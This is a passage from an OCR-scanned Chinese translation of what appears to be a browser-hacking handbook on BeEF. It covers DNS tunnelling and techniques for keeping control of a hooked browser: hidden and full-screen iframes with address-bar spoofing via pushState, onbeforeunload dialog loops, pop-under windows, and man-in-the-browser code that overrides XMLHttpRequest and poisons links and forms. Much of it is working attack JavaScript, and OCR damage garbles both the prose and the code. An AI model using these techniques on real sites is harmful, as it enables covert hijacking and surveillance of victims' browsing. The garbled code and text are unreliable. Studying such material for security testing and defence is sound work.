reconstruct_bytes 函数 迭代 它 以 构建 数据 。 出 于 展示 的 A 的 , browserhacker.com 的 相关 子 域 
静态 映射 到 了 74.125.237.136 ( 谷歌 的 IP )。 图 3-9 展 示 了 在 Chrome 中 运行 前 面 代 码 后 的 结果 。 
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X Elements Resources Network Sources Timeline Profiles _Audits | Console | 








Q Failed to load resource http: Zbit- -00000000-0000003b.browserhacker. con/ favicon. ico 
Q Failed to load resource htt bit-00000000—0000003c.browserhacker.com/favicon.ico 
Q Failed to load resource http: //bit-00000000-0000003d. browserhacker. com/favicon.ico 
Q Failed to load resource http://bit-00000000—0000003e.browserhacker.com/favicon.ico 
Q Failed to load resource http: //bit-00000000-0000003f.browserhacker.com/favicon. ico 

Browser - (8.476 bits/second) server to client.html:82 
> 














© >= Q © «topframe» vw ED | Errors Warnings Logs Debug oss %& 


图 3-9 ”服务 器 通过 DNS 隧道 发 送 字符 串 "Browser" 








注意 为 方便 DNS 通信 ，BeEF 提 供 了 DNS 扩展 。 当 然 ， 也 可 以 使 用 BeEF 作 为 DNS 服务 器 ， 而 且 
在 社会 工程 攻击 中 ， 这 样 也 很 方便 。 此 外 ，BeEF 的 网 络 栈 和 DNS 扩展 可 以 协同 管理 DNS 
隧道 与 匀 连 浏览 器 的 双向 通信 。 





在 本 书 网 站 https:/browserhackercom 上 ， 可 以 找到 基于 DNS 隧道 双向 通信 的 完整 示例 。 虽 然 
ken 青 求 作为 通信 渠道 的 确 比 较 隐 藏 ， 特 别 是 在 面 对 会 检测 Web 请 求 的 代理 服务 器 的 情况 

， 但 它 也 不 总 是 最 有 效 的 通信 方式 。 多 数 情 况 下 ， 发 送 跨 域 XMLHttpRequests 或 WebSocket 
De 是 更 有 效 的 通信 方法 。 


3.3 ”持久 化 技术 


找到 一 种 让 勾 连 浏览 咒 与 服务 器 通信 的 方法 是 一 回 事 ,， 而 随 着 时 间 推 移 , 持久 地 利用 该 方法 
则 要 复杂 得 多 。 保 持 连 接 始终 有 效 ， 即 使 目标 导航 到 不 同 的 网 站 或 断 开 网 络 连接 也 没 问题 ， 就 需 
要 好 好 地 谋划 一 番 了 。 当 然 ， 前 提 是 理解 各 种 可 用 的 方法 。 

接 下 来 儿 节 将 介绍 一 些 持久 化 通信 渠道 的 方法 ,包括 利用 IFrame、 和 窗口 事件 处 理 函 数 、 动 态 
底层 弹出 窗口 ， 以 及 浏览 器 中 间 人 技术 。 单独 使 用 任何 一 种 技术 或 组 合 使 用 这 些 技术 ,可 以 实现 
对 被 勾 连 浏览 器 的 持久 控制 。 


3.3.1 (FAAS 


在 HTML 页 面 中 ，<iframe> 标 签 广泛 用 于 骨 入 另 一 个 文档 。 很 多 广告 引 敬 依靠 使 用 这 个 标 
签 来 显示 在 网 站 中 骨 入 的 营销 部 件 。 

与 其 他 HTML 标 签 和 功能 类 似 ，<iframe> 同 样 可 被 用 于 承载 攻击 。 内 椒 框 架 在 本 书 中 会 被 
多 次 提 到 ， 包 括 9.7.2 节 讨论 使 用 XssRays 发 现 XSS 缺 陷 的 时 候 ， 以 及 4.3.2 节 讨论 点 击 支持 和 光标 
支持 攻击 的 时 候 。 

只 要 想 实现 持久 化 ,内 艇 框架 总 是 首选 方案 ,原因 如 下 : 第 一 ， 你 可 以 完全 控制 内 艇 框架 的 
DOM 内 容 , 也 就 是 说 CSS 内 容 也 可 以 控制 ; 第 二 ， (illae BUS Fel ODE A ac Pt 
事实 ， 为 持久 化 通信 渠道 提供 了 直截了当 的 方法 。 
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架 可 以 在 页 面 上 看 到 , 但 代码 及 其 他 元 素 在 后 台 并 不 可 见 ， 而 是 持续 执行 自 
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己 的 逻辑 。 此 外 ，HTML5 的 History API ARTE, BREA TERCER Pi 
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E 前 存在 反射 型 XSS 漏 洞 。 你 已 经 勾 连 目标 ,但 XSS 并 不 持久 。 





为 了 防止 丢失 到 目标 浏览 器 的 连接 ， 你 可 以 创建 一 个 到 加 层 内 散 术 
属性 指向 该 Web 应 用 











宽度 和 高 度 都 是 100%， 源 


Hi 


EAR. SAE A TIE 


— 5 














的 登录 页 面 。 





在 内 腐 框架 泻 染 后 的 极 短 时 间 内 ， 被 勾 连 浏览 顺 会 显示 登录 页 面 的 内 容 ， 但 地 址 栏 中 的 URI 


仍然 是 以 前 的 。 而 目标 在 这 个 页 面 上 执行 的 任何 操作 都 会 在 琶 加 层 内 髓 不 


标 有 效 地 捕获 到 了 一 个 新 框架 内 。 
令 ， 与 目标 浏览 器 交互 。 
目标 不 可 能 发 现 ] 








E 架 中 发 生 , 相当 于 把 目 
与 此 同时 ， 在 后 台 ， 通信 渠 道 仍然 运行 ， 你 还 可 以 继续 发 送 全 








改 击 。 唯 一 可 能 引起 注意 的 事件 ， 就 是 泻 染 内 诅 框 架 时 发 生 的 页 面 重 载 ， 以 








及 浏览 器 地 址 栏 中 包含 了 与 目标 期 望 不 一 样 的 URI。 





下 面 的 代码 片段 展示 了 使 用 jQuery 创建 一 个 辣 加 内 赂 框架 的 过 得 








createIframe: function(type, params, styles, onload) { 
var ces = {}; 
if (type == 'hidden') { 
css = $j.extend(true, { 
'border':'none', 'width':'1px', 'height':'1lpx 
'display':'none', 'visibility':'hidden'), 
styles); 
} 
if (type == 'fullscreen') { 
css = $j.extend(true, { 
'border':'none', 'background-color':'white', 'width':'100$', 
'height':'100$', 
'position':'absolute', 'top':'Opx', 'left':'Opx'), 
styles); 
$j('body').css(('padding':'Opx', 'margin':'Opx'J); 
} 
var iframe = $j('«iframe />').attr(params) .css ( 


css) .load(onload). 


return iframe; 


} 


prependTo('body'); 


ix^ PRACT VG EE (if type == 'fullscreen'), a PL Gee EGER AREE, 
MR, pex PN RHA UTER K ECSS EEAS NR]. CRA HESS, sth ig 








小 的 框架 大 小 ( 1 像素 )， 而 且 没 有 边框 ， 再 使 用 visipility 和 display 
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适合 发 起 攻击 ， 后 面 几 章 将 详细 介绍 。 
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WY SHAG HEAR A H, mE BE X BICSSISTE RUM RGATE, FRE iT 
元 素 定位 ， 包 括 控 制 它 在 浏览 器 窗口 的 大 小 。 正 确 的 大 小 是 外 边 距 和 内 边 距 均 为 0， 高 度 和 宽度 
均 为 100%。 如 果 利用 这 些 属性 再 加 上 绝对 元 素 定 位 ， 就 可 以 得 到 与 当前 浏览 器 窗口 边框 完美 匹 
配 的 内 只 框架 。 

前 面 的 例子 使 用 jQuery 扩展 了 已 有 的 CSS 样 式 。 创 建 层 县 式 内 艇 框架 时 ， 可 以 像 下 面 的 代码 
这 样 调用 createIframe 函 数 。 在 这 个 例子 中 ， 加 载 了 同 源 页 面 1ogin.jspb， 没 有 传人 任何 CSS 
规则 或 回调 。 

createlframe('fullscreen',{'src':'/login.jsp'}, {}, null); 

如 果 初 始 勾 连 的 页 面 不 一 样 , 比如 是 /page.jsp, IMAI Ae ARI FARES ZH 
果 有 问题 。 页 面 的 内 容 来 自 /1ogin.jsp， 而 浏览 右 地 址 栏 中 显示 的 却 是 /page .jsp。 为 了 解决 
这 个 问题 ， 可 以 利用 HTML5 History API”: 






































history.pushState({be:"EF"}, "page x", "/login.jsp"); 

执行 前 面 的 代码 会 让 浏览 器 把 地 址 栏 中 显示 的 内 容 改 成 Pttp : / / «4 E 89 /10gin. jsp. 
很 明显 , 为 了 安全 起 见 ， 必须 向 pushstate 传 人 一 个 同 源 的 URL,， 否则 就 可 能 触发 安全 和 警报。 使 
用 pushstate 操 纵 浏览 器 地 址 栏 最 有 意思 的 是 ， 浏 览 器 并 不 会 加 载 指定 的 资源 ， 比 如 这 里 的 
/login.jsp， 而 且 这 个 资源 都 不 一 定 需要 真实 存在 。 

利用 内 髓 框架 实现 对 目标 浏览 器 的 持续 控制 , 只 是 可 供 使 用 的 多 种 技术 之 一 。 这 种 技术 的 优 
点 是 得 到 浏览 器 广泛 文 持 ,而 在 当前 内 容 上 闭 加 相同 内 容 更 具 隐 滴 性 ,不 容易 被 发 现 。 当 然 , 这 
种 技术 也 有 局 限 性 。 如 果 你 想 租 入 的 内 容 中 包含 扩张 内 鹃 框架 的 代码 ,或 者 限制 性 
X-Frame-Options 首 部 ， 那 么 就 得 使 用 后 面 介绍 的 技术 了 。 


3.3.2 ”使 用 浏览 器 事件 


你 有 没有 见 过 网 页 在 关闭 前 向 你 显示 确认 对 话 框 ”这 个 行为 有 时 候 特 别 气 人 , 特别 是 在 你 单 
击 了 对 话 框 中 的 OK 之 后 ， 它 还 会 重复 询问 同一 个 问题 的 时 候 。 

这 正 是 你 为 了 让 目标 继续 停留 在 你 可 以 控制 的 指定 页 面 时 所 要 做 的 。 某 些 情况 下 , 让 人 勾 连 页 
面 多 停留 几 秒 ， 就 可 以 多 执行 一 些 命令 模块 。 记 住 ， 要 分 秒 必 争 ， 越 长 越 好 。 

这 个 技术 有 赖 于 处 理 windqow 对 象 的 onbeforeunload 事 件 ， 默 认 由 以 下 条 件 触发 。 
O 触发 unload 事 件 : 关闭 当前 标签 页 、 整 个 浏览 咒 ， 或 打开 别 的 网 站 。 
口 调用 window.close 或 document .close 的 时 候 。 
a 调用 location.replace 或 location.reload 的 时 候 。 
以 下 是 一 个 基本 的 实现 ， 可 以 在 除了 Opera 12 之 前 版 本 的 所 有 桌面 浏览 器 中 工作 : 


function display_confirm() { 
if(confirm("Are you sure you want to navigate away from this 
page?\n\n There is currently a request to the server pending. 
You will lose recent changes by navigating away.\n\n Press OK 
to continue, or Cancel to stay on the current page.")) { 
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display. confirm(); 


function dontleave(e) { 


} 


e = e || window.event; 


// 如 果 浏 览 器 是 IE， 语 法 稍 有 不 同 
if (browser.isIE() ){ 
e.cancelBubble = true; 
e.returnValue = "There is currently a request to the server 


pending. You will lose recent changes by navigating away."; 
}else{ 


if (e.stopPropagation) { 
e.stopPropagation(); 
e.preventDefault(); 
e.returnValue = "There is currently a request to the server 
pending. You will lose recent changes by navigating away."; 


} 


// 再 次 显示 确认 对 话 框 ， 如 果 用 户 按 OK， 就 继续 骚扰 他 

display. confirm(); 

return "There is currently a request to the server pending. You 
will lose recent changes by navigating away."; 


window.onbeforeunload - dontleave; 


这 个 例子 会 覆盖 已 经 注册 onbeforeunload 事 件 的 代码 , 而 执行 aontleave 国 数 。 另 外 要 注 
在 正中，cancelBubble 及 stopPropagation () 了 消 数 会 停止 命令 的 传播 ， 从 而 防止 已 有 也 








数 干扰 新 代码 .根据 已 有 JavaScript 代 码 的 复杂 程度 ,可 能 取消 事件 冒 泡 对 于 提升 性 能 





如 果 有 很 多 构 套 的 元 素 ， 那 么 覆盖 现 有 代码 并 阻止 冒 泡 是 个 不 错 的 选择 。 
行为 在 不 同 浏览 器 中 会 有 所 不 同 。 图 3-10 和 图 3-11 展 示 了 Firefox 18 中 的 行为 。 如 果 受 害 人 单 
击 Cancel， 那么 第 二 个 确认 对 话 框 会 自动 打开 。 如 果 受 害 人 单 击 OK， 那 么 会 循环 地 重复 显示 该 
对 话 框 。 唯 一 可 能 离开 当前 页 面 的 方法 ， 就 是 单 击 图 3-11 中 所 示 的 Leave Page。 


























mos/basic.html The page at http://10.90.82.61:3000 says: 
«9 Are you sure you want to navigate away from this page? 
inst There is currently a request to the server pending. You 
Pg against you. will lose recent changes by navigating away. 
'Get Page HREF! Press OK to continue, or Cancel to stay on the current 
kwork Project ho} duos 
worl ec! > : 
( Cane! | E 
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图 3-10 Firefox 18 中 的 第 一 个 对 话 框 ， 包 含 自 定义 内 容 C 由 JavaScript 控 甫 


= 





是 有 利 的 。 
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os /basic.html Are you sure? 


This page is asking you to confirm that you want to 
leave - data you have entered may not be saved. 


[Stay on Page | (Gene paged 








图 3-11 Firefox 18 中 的 第 二 个 对 话 框 (不 能 通过 JavaScript 控 制 ) 


Windows 7 中 的 IE9 的 行为 也 类 似 , 只 不 过 可 以 稍微 多 控制 一 些 对 话 框 文 本 ,如 图 3-12 和 图 3-13 
所 示 。 图 3-13 所 示 的 第 二 个 对 话 框 中 的 文本 也 可 以 自 定义 。 但 总 体 的 行为 与 Firefox 一 样 。 


Are you sure you want to navigate away from this page? 


There is currently a request to the server pending. You will lose recent 
changes by navigating away. 


Press OK to continue, or Cancel to stay on the current page. 


C 








图 3-12 ”IE9 中 的 第 一 个 对 话 框 ， 包 含 自 定义 内 容 ( 由 JavaScript 控 制 ) 





| o Are you sure you want to leave this page? 


Message from webpage: 


There is currently a request to the server pending. You | 
will lose recent changes by navigating away. 


> Leave this page 





* Stay on this page 


图 3-13 ”IE9 中 的 第 二 个 对 话 框 ( 由 JavaScript 控 制 ) 
鉴于 Firefox 和 Chrome 中 有 限 的 消息 自 定 义 能 力 ， 应 该 只 对 IE 使 用 onclose。 


作为 一 种 持久 化 的 方法 , 使 用 这 些 事件 可 以 多 争取 几 秒 钟 的 执行 时 间 , 但 对 于 持续 控制 目标 
浏览 器 而 言 , 这 显然 是 不 够 的 。 使 用 下 一 小 节 将 要 介绍 的 底层 弹出 窗口 技术 ,可 以 为 持续 控制 勾 
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连 浏 览 器 提供 新 的 机 会 。 当 然 , 你 大 可 以 综合 运用 多 种 技术 , 同时 使 用 自 定义 关闭 事件 处 理 程序 。 
使 用 内 艇 框架 和 弹出 窗口 ， 可 以 成 功 保持 勾 连 ， 最 大 程度 地 为 执行 你 的 命令 争取 时 间 。 


3.3.3 ”使 用 底层 弹出 窗口 


上 网 时 , 最 让 人 讨厌 的 就 是 未 经 提醒 突然 出 现 的 弹出 广告 了 。 你 曾经 有 多 少 次 被 迫 重 复 关 掉 
多 个 弹出 广告 ? 这 种 显示 弹出 广告 的 窗口 会 出 现在 当前 页 面 的 前 面 , 而 底层 弹出 窗口 则 出 现在 后 
台 ， 也 就 是 说 位 于 当前 浏览 器 窗口 后 面 。 大 多 数 现代 浏览 器 默认 都 会 屏蔽 这 种 底层 弹出 窗口 。 

要 使 用 JavaScript 打 开 底 层 弹 出 窗口 ， 最 简单 的 方法 就 是 window .open () 。 默 认 情 况 下 ， 下 
面 的 代码 在 最 新 版 本 的 Firefox 和 Chrome 中 会 被 屏蔽 : 


window.open('http://example.com', 'popunder', 'toolbar=0 
location=0,directories=0,status=0,menubar=0,scrollbars=0, 
resizable=0,width=1,height=1,left='+screen.width+', 
top='+screen.height+'').blur(); 






























































window. focus () ; 

之 所 以 会 被 屏蔽 , 是 因为 浏览 器 认为 这 个 新 窗口 并 未 经 用 户 操作 ( 比如 单 击 鼠标 ) 就 打开 了 。 

接 下 来 考虑 怎么 绕 过 这 种 行为 。 首 先 ， 可 以 使 用 MouseEvents 以 编程 方式 通过 JavaScript 代 
码 模仿 鼠标 操作 。 假 设 有 一 个 可 以 控制 的 链接 ， 可 能 是 动态 创建 的 ,也 可 能 是 onclick 属性 中 的 
一 个 XSS 隐 患 ， 比 如 : 


<a id="malicious_link" href="http://google.com" 
onclick=" open link()"»Goo«/a» 


然后 在 同一 个 页 面 中 注入 以 下 JavaScript 代 码 : 


function open_link() { 

window.open('http://example.com', 'popunder', 'toolbar=0, 
location=0,directories=0,status=0,menubar=0,scrollbars=0, 
resizable=0,width=1,height=1,left='+screen.width+', 
top='+screen.height+'').blur(); 








n 























window.focus(); 


} 


function clickLink(link) { 
var cancelled = false; 
if (document.createEvent) { 
var event = document.createEvent ("MouseEvents") ; 
event .initMouseEvent ("click", true, true, window, 
0, 0, 0, 0, 0, false, false, false, false, 0, null); 
link.dispatchEvent (event); 
)else if(link.fireEvent)( 
link.fireEvent("onclick"); 
} 
} 


clickLink (document .getElementById('malicious_link')); 
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前 面 的 代码 告诉 浏览 器 在 一 个 具有 给 定 ID 的 a 元 素 被 单 击 时 ,执行 clickLink() 函数 。 这 
链接 有 一 个 会 调用 window.open 的 onclick 事 件 。 可 惜 ， 这 个 试验 不 会 那么 成 功 ， 因 为 通 
JavaScript 创 建 的 MouseEvent 与 真正 的 用 户 单 击 还 是 不 一 样 的 。 

要 绕 过 这 个 限制 , 不 依赖 创建 鼠标 事件 , 可 以 再 狐 独 一些 , 使 用 JavaScript 添 加 或 覆盖 当前 页 
面 链接 上 的 cnclick 属 性 。 这 个 技术 在 下 一 小 节 还 会 进一步 扩展 。 

下 面 的 代码 先 取 得 页 面 中 所 有 <a> 标 签 ， 给 它们 添加 一 个 onclick 属 性 ， 当 用 户 单 击 时 就 会 
打开 一 个 底层 弹出 窗口 。$ .popunder () 函数 是 一 个 jQuery 插件 “， 作 者 是 Hans-Peter Buniat， 用 
于 创建 跨 浏览 器 的 底层 弹出 窗口 。 


var anchors = document.getElementsByTagName ("a"); 

































































for (var i = 0; i < anchors.length; i++) { 
if (anchors[i].hasAttribute("onclick") ) { 
anchors [i].removeAttribute ("onclick"); 

j 

// aPopunder 对 象 在 下 面 的 代码 片段 中 定义 

anchors[i].setAttribute("onclick", "$.popunder (aPopunder) ") 

} 
当 用 户 单 击 这 个 页 面 中 的 一 个 链接 时 , 除了 打开 href 属 性 中 的 URI, 还 会 打开 一 个 底层 弹出 


























窗口 。 现 代 浏 览 器 ， 除 了 Opera， 默 认 不 会 屏蔽 这 样 打开 的 底层 弹出 窗口 。 

更 进一步 ， 如 果 你 想 再 隐蔽 一 些 , 可 以 把 这 个 底层 弹出 窗口 定位 在 当前 浏览 需 窗口 下 方 。 为 
此 ， 要 先 检 查 当 前 窗口 的 位 置 ， 即 使 用 windqow.screenX 和 windqow.sctreenY。 而 底层 弹出 窗口 
的 大 小 至 少 为 1 像素 ， 如 果 设 置 成 0 像素 ， 就 会 被 多 数 浏 览 器 屏蔽 掉 。 然 而 ， 得 到 的 底层 弹出 窗口 
通常 都 比 1 像 素 大 ， 如 图 3-14 所 示 。 注 意 ， 图 中 的 几 个 底层 弹出 窗口 是 手工 拖 动 到 目前 所 在 位 置 
的 (浏览 带 主 窗口 的 左 侧 )， 要 不 然 用 户 是 看 不 到 的 。 
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图 3-14 ”Firefox 和 Safari 中 底层 弹出 窗口 的 大 小 差异 
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为 此 ， 可 以 把 $ . popunder () 函数 修改 为 如 下 所 示 : 


var aPopunder = [ 
['http://browserhacker.com', {"window": {height:1, 
width:1, left:window.screenX, top:window.screenY}}]; 
$.popunder (aPopunder) 


这 样 在 用 户 单 击 被 动态 修改 后 的 链接 时 ， 就 会 加 载 一 个 指向 http:/browserhackercom 的 底层 
弹出 窗口 。 我 们 想 利用 这 个 技术 实现 的 , 就 是 在 这 个 窗口 中 加 载 JavaScript 程 序 。 把 这 个 技术 与 浏 
览 器 中 间 人 或 者 内 柚 框 架 结合 ,可 以 在 受害 人 关闭 当前 勾 连 的 标签 页 时 , 保持 对 其 的 跟踪 ， 从 而 
实现 持久 化 。 


3.3.4 ”使 用 浏览 器 中 间 人 攻击 


AJAX (Asynchronous JavaScript and XML ， 异 步 JavaScript 和 XML ) 是 创建 快速 响应 的 Web 
应 用 的 最 流行 的 技术 之 一 。 正 是 因为 AJAX 的 爆炸 式 应 用 ，JavaScript 才 获得 了 新 生 。 自 然 地 ， 攻 
击 者 也 开始 着 手 利 用 AJAX 了 。 

从 攻击 者 角度 看 , 使 用 AJAX 的 好 处 之 一 是 增强 的 浏览 器 中 间 人 (Man-in-the-Browser, MitB ) 
技术 。 利 用 这 个 技术 可 以 更 有 效 地 实现 持久 化 ,避免 很 多 传统 内 能 框架 县 加 的 安全 问题 ， 因 为 即 
使 在 有 X-Frame-Options 首 部 和 其 他 扩张 框架 逻辑 的 情况 下 ， 它 仍然 有 效 。 

MitB 攻 击 在 第 2 章 简 单 讨论 过 ， 可 以 让 你 观察 用 户 在 干什么 ， 比 如 单 击 了 一 个 同 源 链接 ,或 
者 提交 了 表单 。MitB 代 码 可 以 拦截 并 扩展 DOM 事 件 处 理 功能 , 并 可 以 动态 执行 用 户 发 起 的 操作 。 
此 时 , 可 以 获取 正确 的 资源 , 将 结果 返回 给 用 户 ， 同 时 还 可 以 维护 与 攻击 者 控制 的 服务 器 的 持久 
连接 。 

常规 页 面 与 MitB 中 毒 页 面 的 区 别 在 于 ，MitB 会 异步 加 载 资源 ， 同 时 保持 勾 连 活动 。 比 如 ， 
如 果 通 过 一 个 反射 型 XSS 勾 连 了 目标 ,那么 用 户 只 要 单 击 一 个 同 源 链接 就 会 造成 勾 连 丢 失 。 这 是 
因为 页 面 会 刷新 ， 脚 本 会 重新 加 载 ， 原先 通 过 XSS 注 入 的 脚本 就 不 存在 了 。 这 个 问题 虽然 可 以 通 
过 使 用 前 面 介绍 的 内 髓 框架 解决 , 但 我 们 也 知道 某 些 情况 下 这 个 方法 不 会 奏效 。 另 一 方面 , MitB 
技术 则 有 可 能 在 内 扒 框 架 不 能 使 用 时 取而代之 。 





































































































浏览 器 中 间 人 与 中 间 人 攻击 





MitM 攻 击 一 般 指 网 络 层 的 窃听 攻击 ,而 MitB 攻 击 则 指 应 用 层 , 甚至 浏览 器 层 的 窃听 攻击 。 
MitB 与 MitM 类 似 的 地 方 是 都 依赖 合法 的 服务 器 返回 给 攻击 者 的 数据 。MitB 经 常 被 SpyEye 和 
Zeus2 等 恶意 银行 软件 使 用 ， 用 于 在 用 户 访 问 银行 网 站 时 自 改 浏览 器 泻 染 的 内 容 。 

根据 恶意 软件 的 配置 不 同 ， 修 改 页 面 内 容 的 方式 也 不 同 。 最 后 通常 会 修改 页 面 的 HTML 
的 外 观 ， 以 显示 虚假 内 容 。 上 比如， 修改 一 个 银行 网 站 的 登录 页 面 ， 声 称 银行 提供 了 新 的 “ 安 
全 ”措施 ， 需 要 用 户 提 供 生日 、 母 亲 的 娘家 姓 等 详细 信息 ， 或 者 其 他 认证 信息 ( 比如 RSA 一 
次 性 PIN )。 

因为 这 些 攻击 完全 在 客户 端 中 ,服务 器 很 少 发 觉 ， 所 以 很 难 被 发 现 。 于 是 ,服务 器 端 防范 
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手段 或 Web 应 用 防火 墙 很 难 派 上 用 场 。 

do I S 其 中 一 种 方式 有 赖 于 截获 被 感染 机 器 与 目标 银行 网 站 的 通信 ， 然 后 在 
浏览 器 泻 染 之 前 修改 返回 的 HTML 内 容 。 另 一 种 方式 是 向 页 面 中 注入 动态 和 覆盖 页 面 行为 的 自 定 
En 毒化 现 有 Web 应 用 逻辑 ， 并 添加 新 内 容 。 


1. 劫持 AJAX 调 用 
MitB 攻 击 的 目标 是 劫持 AJAX 的 GET 和 POST 请 求 , 无 论 同 源 还 是 跨 域 都 可 以 。 这 种 攻击 成 为 


EH 2 


是 得 益 于 JavaScript 和 DOM 的 灵活 性 。JavaScript 的 一 个 重要 特性 是 能 够 重 写 内 置 DOM 方 法 的 




































































重 写 原 型 是 MitB 攻 击 支持 AJAX 请 求 的 关键 。 以 下 摘自 BeEF 的 代码 展示 了 如 何 用 自 定义 逻辑 
重 写 XMLHttpRequest 对 象 原型 的 open 方 法 。 因 为 这 些 代 码 也 依赖 BeEF 的 某 些 其 他 功能 ， 所 以 
不 能 简单 地 复制 粘贴 。 


initifuection (end, curly. 
beef.mitb.cid = cid; 
beef.mitb.curl = curl; 
/* 重 写 open 方 法 以 动 持 Ajax 请 求 */ 
var xml_type; 
var hook_file = "<%= @hook_file %>"; 





if (window.XMLHttpRequest && !(window.ActiveXObject)) { 
beef.mitb.sniff("Method XMLHttpRequest.open override"); 
(function (open) ( 
XMLHttpRequest.prototype.open - function (method, url, 
async, mitb call) { 
// 忽略 ， 不 劫持 
// 这 个 请 求 属于 轮 询 过 程 


if (mitb call || (url.indexOf(hook file) != -1 || \ 
url.indexOf("/dh?") != -1)) ( 
open.call(this, method, url, async, true); 
) else { 
var portRegex = new RegExp(":[0-9]+"); 


var portR - portRegex.exec(url); 
var requestPort; 


if (portR !- null) ( requestPort - portR[0].split(":")[1]; ) 


// GET 请 求 


if (method == "GET") { 
// GET 请 求 -> SiR 
if (url.indexOf (document.location.hostname) == -1 || \ 

(portR != null && requestPort != document.location.port ))( 
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url); 
window.open (url) ; 

jelse { 
// GET 请 求 -> AR 
beef.mitb.sniff("GET [Ajax Request]: " + url); 


if (beef.mitb.fetch(url, 
document.getElementsByTagName ("html") [0])) { 





var title s" 


if(document.getElementsByTagName("title").length == O)( 
title - document.title; 
) else { 


title = document.getElementsByTagName|( 
"title") [0] .innerHTML; 


// 写 出 该 页 面 Url 
history.pushState({ Be:"EF" }, title, url); 


} 
}else{ 
// POST 请 求 
beef.mitb.sniff("POST ajax request to: " + url); 
open.call(this, method, url, async, true); 
} 
} 
i 
}) (XMLHttpRequest.prototype.open); 
} 
), 


调用 这 个 init 函 数 后 , 每 次 使 用 XxMLHttpRequest .open, 其 行为 都 会 按照 重 写 后 的 自 定义 
实现 而 发 生变 化 。 

(1) 检测 是 MitB 在 发 起 请 求 ， 还 是 勾 连 的 通信 请 求 。 如 果 是 第 二 种 情况 ， 则 不 支持 。 

(2) 如 果 请 求 方法 是 GET， 确 定 请 求 是 同 源 还 是 跨 域 。 

(3) 如 果 是 同 源 ， 在 当面 页 面 加 载 资源 并 显示 内 容 ， 保 证 持久 色 连 。 使 用 原始 页 面 标题 代替 
页 面 标题 ， 使 用 历史 对 象 (history.pushState ) 将 地 址 栏 内 容 替 换 成 适当 的 资源 URI。 

(4) 如 果 是 跨 域 ， 在 新 标签 页 中 打开 资源 (window.open), 保持 当 前 页 面 的 勾 连 。 

(5) 如 果 请 求 方法 是 POST， 直 接 发 送 请 求 。 

2. 劫持 非 AJAX 请 求 

非 AJAX 的 GET 和 POST 请 求 也 可 以 支持 。 与 AJAX 资 源 类 似 , MitB 代 码 会 预先 取得 常规 资源 ， 
算 改 链接 和 表单 的 默认 行为 (也 叫 “ 下 毒 ”)。 

比如 ， 页 面 中 的 一 个 <a> 标 签 本 来 指向 同 源 资源 ，MitB 给 它 添加 一 个 onclick 事 件 属性 ,用 
于 执行 JavaScript 函 数 。 用 户 单 击 这 个 链接 时 ， 默 认 行 为 (通过 GET 获 取 页 面 ) 被 阻止 , 接 下 来 的 
单 击 事件 由 新 的 onclick 事 件 处 理 程序 接管 。 如 果 链 接 已 经 有 了 onclick 属 性 , 那么 MitB 会 调用 
别 的 函数 来 蔡 换 其 处 理 程序 。 下 面 是 BeEF 中 的 相应 代码 片段 : 


// 通过 AJAX 取 得 久 连 的 链接 
fetch:function (url, target) { 
try { 

var y = new XMLHttpRequest (); 

y.open('GET', url, false, true); 
y.onreadystatechange = function () { 

if (y.readyState == 4 && y.responseText != "") { 
target.innerHTML = y.responseText; 
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y.send(null); 
beef.mitb.sniff("GET: " + url); 
return true; 
} catch (x) { 
window.open (url) ; 
beef.mitb.sniff ("GET [New Window]: " + url); 
return false; 


}, 





// 锁定 链接 ， 阻 止 离开 
poisonAnchor:function (e) { 
try { 
e.preventDefault; 
if (beef.mitb.fetch(e.currentTarget, 


document.getElementsByTagName("html")[0])) { 
var title - ""; 
if(document.getElementsByTagName("title").length == 0) { 
title = document.title; 
Jelse{ 


title = document .getElement sByTagName ( 
"title") [0].innerHTML; 

} 
history.pushState(( Be:"EF" }, title, e.currentTarget); 

j 
) catch (e) { 
console.error('beef.mitb.poisonAnchor - failed to execute: '+ 

e.message); 





} 


return false; 
Fa 


var anchors = document.getElementsByTagName("a"); 
var lis = document.getElementsByTagName ("li"); 


for (var i = 0; i < anchors.length; i++) { 
anchors[i].onclick = beef.mitb.poisonAnchor; 


for (var i = 0; i < lis.length; i++) { 
if (lis[i].hasAttribute("onclick")) { 
] 


lis[i].removeAttribute("onclick"); 

/* 清 除 */ 

lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick( 
'"«lis[i].getElementsByTagName("a")[0] + "')"); 

/*€5*/ 


j 
ix AY fetchonclickPhM AS fetch BAW, ARAM ST. AIERBE 
源 代码 : https://browserhacker.com. 
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对 表单 下 毒 与 对 链接 下 毒 类 似 。 唯 一 的 区 别 是 需要 更 多 逻辑 ， 因 为 在 触发 onsubmit 事 件 时 
需要 解析 表单 字段 。 结 果 都 一 样 ， 因 此 PosT 请 求 会 使 用 AJAX 发 送 ， 而 目标 innerHTML 的 内 容 会 





用 适当 的 内 容 更 新 。 与 此 同时 ， 后 台 的 勾 连 仍然 持续 。 








目标 不 可 能 发 现 这 种 攻击 ， 因 为 页 面 的 内 


容 不 会 发 生 任何 变化 。 唯 一 的 可 疑 之 处 是 在 新 标签 页 而 不 是 当前 窗口 中 打开 跨 域 链接 。 


从 监控 到 扩展 攻击 面 


请 注意 ， 用 户 单 击 了 什么 链接 ， 提 交 了 什么 表单 ( 包括 数据 )， 都 是 可 以 记录 并 被 你 查看 
的 。 特 别 是 在 用 户 单 击 了 跨 域 链接 的 时 候 ， 你 可 以 利用 这 一 点 。 此 时 ， 由 于 同 源 策略 存在 ， 通 
过 AJAX 加 载 资源 显然 不 会 成 功 。 这 时 候 ， 链 接 只 会 打开 一 个 新 标签 页 ， 而 原来 打开 并 义 连 的 


标签 页 仍然 有 效 。 因为 不 同 源 ， 所 以 无 法 控制 新 打开 的 标签 


你 “可 以 完全 控制 页 面 的 DOM。 


页 。 但 你 可 以 知道 它 的 URL， 因 为 


此 时 ， 通 过 在 目标 资源 上 运行 XsSRays 查 找 XSS 漏 洞 ， 如 果 找 到 新 
的 漏洞 ， 那 就 又 可 以 通过 它 匀 连 新 的 源 ， 从 而 获得 对 第 二 个 标 


用 XssRays 的 技术 将 在 第 9 章 介 绍 。 


页 中 加 载 的 源 的 控制 。 这 种 使 


与 其 他 维护 持久 化 通信 的 技术 一 样 , 这 种 技术 成 功 与 否 也 取决 于 很 多 因素 。 使 用 MitB 的 一 个 




















可 能 的 问题 是 处 理 基 于 JavaScript 的 复杂 应 用 。 比 如 ， 











使 用 这 种 技术 最 终 会 形成 一 个 事件 处 理 程序 栈 ， 即 新 注入 的 程序 会 





行 。 在 将 中 毒 AJAX 请 求 的 响应 追加 到 正确 的 页 面 片段 时 ， 也 会 





